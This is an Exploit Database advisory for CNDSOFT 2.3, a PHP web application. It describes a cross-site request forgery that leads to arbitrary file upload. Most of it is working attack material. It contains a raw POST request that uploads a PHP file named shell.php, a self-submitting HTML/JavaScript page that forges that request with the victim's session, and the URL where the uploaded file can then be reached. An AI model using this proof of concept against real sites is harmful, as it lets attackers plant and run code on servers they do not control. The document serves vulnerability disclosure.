CNDSOFT 2.3 – Cross-Site Request Forgery / Arbitrary File Upload

• Exploit Database
• 14 阅读

• 作者： Besim
  日期： 2016-10-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40575/

• *=========================================================================================================
  # Exploit Title:CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
  # Author: Besim
  # Google Dork: -
  # Date: 19/10/2016
  # Type: webapps
  # Platform : PHP
  # Vendor Homepage: -
  # Software Link: http://www.phpexplorer.com/Goster/1227
  # Version: 2.3
  *=========================================================================================================
  
  
  Vulnerable URL and Parameter
  ========================================
  
  Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
  
  Vulnerable Parameter = &mesaj_baslik
  
  
  TECHNICAL DETAILS & POC & POST DATA
  ========================================
  
  POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
  Host: localhost:8081
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
  Gecko/20100101 Firefox/49.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
  ——
  Content-Type: multipart/form-data;
  boundary=---------------------------5035863528338
  Content-Length: 1037
  
  -----------------------------5035863528338
  Content-Disposition: form-data; name="utf8"
  
  ✓
  -----------------------------5035863528338
  Content-Disposition: form-data; name="authenticity_token"
  
  CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
  -----------------------------5035863528338
  Content-Disposition: form-data; name="kullanici_adi"
  
  meryem
  -----------------------------5035863528338
  Content-Disposition: form-data; name="kullanici_sifresi"
  
  meryem
  -----------------------------5035863528338
  Content-Disposition: form-data; name="kullanici_mail_adresi"
  m@yop.com
  -----------------------------5035863528338
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  30000
  -----------------------------5035863528338
  Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
  Content-Type: application/octet-stream
  *<?php
  	phpinfo();
  
   ?>*
  -----------------------------5035863528338
  Content-Disposition: form-data; name="personel_maasi"
  
  5200
  -----------------------------5035863528338--
  
  
  *CSRF PoC - File Upload (Shell.php)*
  
  ========================================
  
  <html>
  <!-- CSRF PoC -->
  <body>
  <script>
  function submitRequest()
  {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "
  http://site_name/ofis/index.php?is=kullanici_tanimla", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
  xhr.withCredentials = true;
  var body = "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"utf8\"\r\n" +
  "\r\n" +
  "\xe2\x9c\x93\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
  +
  "\r\n" +
  "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
  "\r\n" +
  "meryem\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
  +
  "\r\n" +
  "meryem\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
  "\r\n" +
  "m@yop.com\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
  "\r\n" +
  "30000\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
  "Content-Type: application/octet-stream\r\n" +
  "\r\n" +
  "\x3c?php \r\n" +
  "\tphpinfo();\r\n" +
  "\r\n" +
  " ?\x3e\r\n" +
  "-----------------------------5035863528338\r\n" +
  "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
  "\r\n" +
  "5200\r\n" +
  "-----------------------------5035863528338--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
  }
  submitRequest();
  </script>
  <form action="#">
  <input type="button" value="Submit request"
  onclick="submitRequest();" />
  </form>
  </body>
  </html>
  
  ========================================
  
  *Access File : *http://www.site_name/path/personel_resimleri/shell.php
  
  
  RISK
  ========================================
  
  Attacker can arbitrary file upload.
  
  
  --
  
  Besim ALTINOK